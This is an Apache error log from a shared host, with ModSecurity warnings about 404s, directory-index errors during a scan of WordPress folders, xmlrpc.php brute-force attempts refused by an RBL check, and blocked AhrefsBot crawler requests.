[Tue May 26 17:19:12.911480 2026] [autoindex:error] [pid 869189:tid 869404] [client 185.92.25.52:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/sodium_compat/src/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:13.437365 2026] [security2:error] [pid 869189:tid 869327] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIudB5TZSn88J_oroA_wAAAAc"]
[Tue May 26 17:19:14.294682 2026] [security2:error] [pid 869189:tid 869344] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIutB5TZSn88J_oroBGAAAABg"]
[Tue May 26 17:19:14.490233 2026] [security2:error] [pid 869189:tid 869444] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIutB5TZSn88J_oroBFQAAAHw"]
[Tue May 26 17:19:14.832771 2026] [security2:error] [pid 869189:tid 869384] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIutB5TZSn88J_oroBJwAAAEA"]
[Tue May 26 17:19:15.173707 2026] [security2:error] [pid 869189:tid 869407] [client 223.235.98.214:24277] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIu9B5TZSn88J_oroBLgAAAFc"]
[Tue May 26 17:19:15.173834 2026] [security2:error] [pid 869189:tid 869407] [client 223.235.98.214:24277] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIu9B5TZSn88J_oroBLgAAAFc"]
[Tue May 26 17:19:15.350046 2026] [security2:error] [pid 869189:tid 869347] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIu9B5TZSn88J_oroBMQAAABs"]
[Tue May 26 17:19:15.488686 2026] [security2:error] [pid 869189:tid 869358] [client 203.194.101.7:60954] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWIu9B5TZSn88J_oroBPgAAACY"]
[Tue May 26 17:19:15.488843 2026] [security2:error] [pid 869189:tid 869358] [client 203.194.101.7:60954] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWIu9B5TZSn88J_oroBPgAAACY"]
[Tue May 26 17:19:15.695006 2026] [security2:error] [pid 869189:tid 869399] [client 68.82.205.74:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIu9B5TZSn88J_oroBNAAAAE8"]
[Tue May 26 17:19:15.846671 2026] [autoindex:error] [pid 869189:tid 869375] [client 185.92.25.52:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/js/tinymce/plugins/fullscreen/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:16.199783 2026] [security2:error] [pid 869189:tid 869381] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIvNB5TZSn88J_oroBUQAAAD0"]
[Tue May 26 17:19:16.811030 2026] [security2:error] [pid 869189:tid 869403] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIvNB5TZSn88J_oroBbQAAAFM"]
[Tue May 26 17:19:17.221828 2026] [security2:error] [pid 869189:tid 869347] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIvNB5TZSn88J_oroBcAAAABs"]
[Tue May 26 17:19:17.387378 2026] [security2:error] [pid 869189:tid 869436] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIvdB5TZSn88J_oroBggAAAHQ"]
[Tue May 26 17:19:17.852966 2026] [autoindex:error] [pid 869189:tid 869433] [client 185.92.25.52:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/interactivity-api/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:18.030239 2026] [autoindex:error] [pid 869189:tid 869394] [client 185.92.25.52:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/l10n/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:18.504863 2026] [security2:error] [pid 869189:tid 869409] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIvtB5TZSn88J_oroBrgAAAFk"]
[Tue May 26 17:19:19.098952 2026] [autoindex:error] [pid 869189:tid 869391] [client 185.92.25.52:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/js/tinymce/utils/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:19.463121 2026] [security2:error] [pid 869189:tid 869370] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIv9B5TZSn88J_oroBxgAAADI"]
[Tue May 26 17:19:19.939855 2026] [security2:error] [pid 869189:tid 869396] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIv9B5TZSn88J_oroB3AAAAEw"]
[Tue May 26 17:19:20.136938 2026] [autoindex:error] [pid 869189:tid 869331] [client 195.3.220.7:0] AH01276: Cannot serve directory /home1/taote1zo/public_html/afstpaul.org/.tmb/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/
[Tue May 26 17:19:20.347713 2026] [security2:error] [pid 869189:tid 869395] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIwNB5TZSn88J_oroB8gAAAEs"]
[Tue May 26 17:19:20.524358 2026] [core:error] [pid 869189:tid 869411] [client 87.236.176.228:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:19:20.524386 2026] [core:error] [pid 869189:tid 869411] [client 87.236.176.228:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:19:20.859222 2026] [autoindex:error] [pid 869189:tid 869372] [client 195.3.220.7:0] AH01276: Cannot serve directory /home1/taote1zo/public_html/afstpaul.org/.tmb/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/
[Tue May 26 17:19:20.902177 2026] [security2:error] [pid 869189:tid 869410] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIwNB5TZSn88J_oroCDQAAAFo"]
[Tue May 26 17:19:21.411611 2026] [security2:error] [pid 869189:tid 869408] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIwNB5TZSn88J_oroCGAAAAFg"]
[Tue May 26 17:19:21.462459 2026] [security2:error] [pid 869189:tid 869433] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIwdB5TZSn88J_oroCJgAAAHE"]
[Tue May 26 17:19:21.882528 2026] [security2:error] [pid 869189:tid 869350] [client 195.3.220.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "afstpaul.org"] [uri "/index.php"] [unique_id "ahWIwdB5TZSn88J_oroCIAAAAB4"], referer: https://google.com/
[Tue May 26 17:19:21.944236 2026] [security2:error] [pid 869189:tid 869348] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIwdB5TZSn88J_oroCNAAAABw"]
[Tue May 26 17:19:22.352181 2026] [autoindex:error] [pid 869189:tid 869440] [client 185.92.25.52:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/js/codemirror/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:22.560290 2026] [autoindex:error] [pid 869189:tid 869441] [client 185.92.25.52:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/js/tinymce/langs/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:22.823952 2026] [autoindex:error] [pid 869189:tid 869364] [client 185.92.25.52:33955] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-admin/css/colors/modern/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:23.119011 2026] [autoindex:error] [pid 869189:tid 869329] [client 185.92.25.52:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/blocks/group/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:23.189767 2026] [security2:error] [pid 869189:tid 869373] [client 195.3.220.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "afstpaul.org"] [uri "/index.php"] [unique_id "ahWIwtB5TZSn88J_oroCUwAAADU"], referer: https://google.com/
[Tue May 26 17:19:23.454524 2026] [security2:error] [pid 869189:tid 869431] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIw9B5TZSn88J_oroCZgAAAG8"]
[Tue May 26 17:19:23.920152 2026] [security2:error] [pid 869189:tid 869406] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIw9B5TZSn88J_oroCegAAAFY"]
[Tue May 26 17:19:24.285179 2026] [security2:error] [pid 869189:tid 869395] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIw9B5TZSn88J_oroCfgAAAEs"]
[Tue May 26 17:19:24.451615 2026] [autoindex:error] [pid 869189:tid 869332] [client 195.3.220.7:0] AH01276: Cannot serve directory /home1/taote1zo/public_html/afstpaul.org/wp-content/uploads/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/
[Tue May 26 17:19:24.510297 2026] [security2:error] [pid 869189:tid 869364] [client 69.58.64.198:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWIxNB5TZSn88J_oroClgAAACw"], referer: https://www.anujtradingco.com/
[Tue May 26 17:19:24.826076 2026] [autoindex:error] [pid 869189:tid 869417] [client 195.3.220.7:0] AH01276: Cannot serve directory /home1/taote1zo/public_html/afstpaul.org/wp-content/uploads/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/
[Tue May 26 17:19:24.959978 2026] [security2:error] [pid 869189:tid 869370] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIxNB5TZSn88J_oroCqAAAADI"]
[Tue May 26 17:19:25.346097 2026] [autoindex:error] [pid 869189:tid 869447] [client 195.3.220.7:0] AH01276: Cannot serve directory /home1/taote1zo/public_html/afstpaul.org/wp-content/upgrade/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/
[Tue May 26 17:19:25.706308 2026] [autoindex:error] [pid 869189:tid 869379] [client 195.3.220.7:0] AH01276: Cannot serve directory /home1/taote1zo/public_html/afstpaul.org/wp-content/upgrade/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/
[Tue May 26 17:19:25.728953 2026] [security2:error] [pid 869189:tid 869439] [client 69.58.64.198:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWIxdB5TZSn88J_oroCxwAAAHc"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1418267&moderation-hash=9be30dabce180487f5f9cabe7d60938d
[Tue May 26 17:19:25.851841 2026] [security2:error] [pid 869189:tid 869410] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIxdB5TZSn88J_oroCzQAAAFo"]
[Tue May 26 17:19:25.863655 2026] [security2:error] [pid 869189:tid 869350] [client 203.194.101.7:61279] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWIxdB5TZSn88J_oroCzgAAAB4"]
[Tue May 26 17:19:25.863759 2026] [security2:error] [pid 869189:tid 869350] [client 203.194.101.7:61279] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWIxdB5TZSn88J_oroCzgAAAB4"]
[Tue May 26 17:19:25.990422 2026] [security2:error] [pid 869189:tid 869413] [client 223.235.98.214:24923] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIxdB5TZSn88J_oroC2AAAAF0"]
[Tue May 26 17:19:25.990568 2026] [security2:error] [pid 869189:tid 869413] [client 223.235.98.214:24923] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIxdB5TZSn88J_oroC2AAAAF0"]
[Tue May 26 17:19:26.257898 2026] [security2:error] [pid 869189:tid 869330] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIxdB5TZSn88J_oroC1wAAAAo"]
[Tue May 26 17:19:26.470467 2026] [autoindex:error] [pid 869189:tid 869390] [client 185.92.25.52:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/css/dist/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:26.908177 2026] [security2:error] [pid 869189:tid 869328] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIxtB5TZSn88J_oroC_AAAAAg"]
[Tue May 26 17:19:27.477647 2026] [security2:error] [pid 869189:tid 869376] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIx9B5TZSn88J_oroDFAAAADg"]
[Tue May 26 17:19:27.645703 2026] [security2:error] [pid 869189:tid 869222] [remote 54.38.147.125:21300] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "glorodrc.com"] [uri "/robots.txt"] [unique_id "ahWIx9B5TZSn88J_oroDGAAAZB8"]
[Tue May 26 17:19:27.645904 2026] [security2:error] [pid 869189:tid 869420] [client 54.38.147.125:21300] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "glorodrc.com"] [uri "/robots.txt"] [unique_id "ahWIx9B5TZSn88J_oroDGAAAZB8"]
[Tue May 26 17:19:27.701641 2026] [security2:error] [pid 869189:tid 869371] [client 195.3.220.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "afstpaul.org"] [uri "/index.php"] [unique_id "ahWIx9B5TZSn88J_oroDCAAAADM"], referer: https://google.com/
[Tue May 26 17:19:28.103704 2026] [security2:error] [pid 869189:tid 869405] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIx9B5TZSn88J_oroDIwAAAFU"]
[Tue May 26 17:19:28.876089 2026] [security2:error] [pid 869189:tid 869325] [client 195.3.220.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "afstpaul.org"] [uri "/index.php"] [unique_id "ahWIyNB5TZSn88J_oroDLgAAAAU"], referer: https://google.com/
[Tue May 26 17:19:28.904848 2026] [autoindex:error] [pid 869189:tid 869359] [client 185.92.25.52:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/blocks/file/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:28.991736 2026] [security2:error] [pid 869189:tid 869378] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIyNB5TZSn88J_oroDOAAAADo"]
[Tue May 26 17:19:29.131930 2026] [security2:error] [pid 869189:tid 869276] [remote 54.39.6.95:52064] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "glorodrc.com"] [uri "/"] [unique_id "ahWIydB5TZSn88J_oroDcgAAd1U"]
[Tue May 26 17:19:29.132139 2026] [security2:error] [pid 869189:tid 869439] [client 54.39.6.95:52064] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "glorodrc.com"] [uri "/"] [unique_id "ahWIydB5TZSn88J_oroDcgAAd1U"]
[Tue May 26 17:19:29.138719 2026] [autoindex:error] [pid 869189:tid 869423] [client 185.92.25.52:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-content/mu-plugins/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
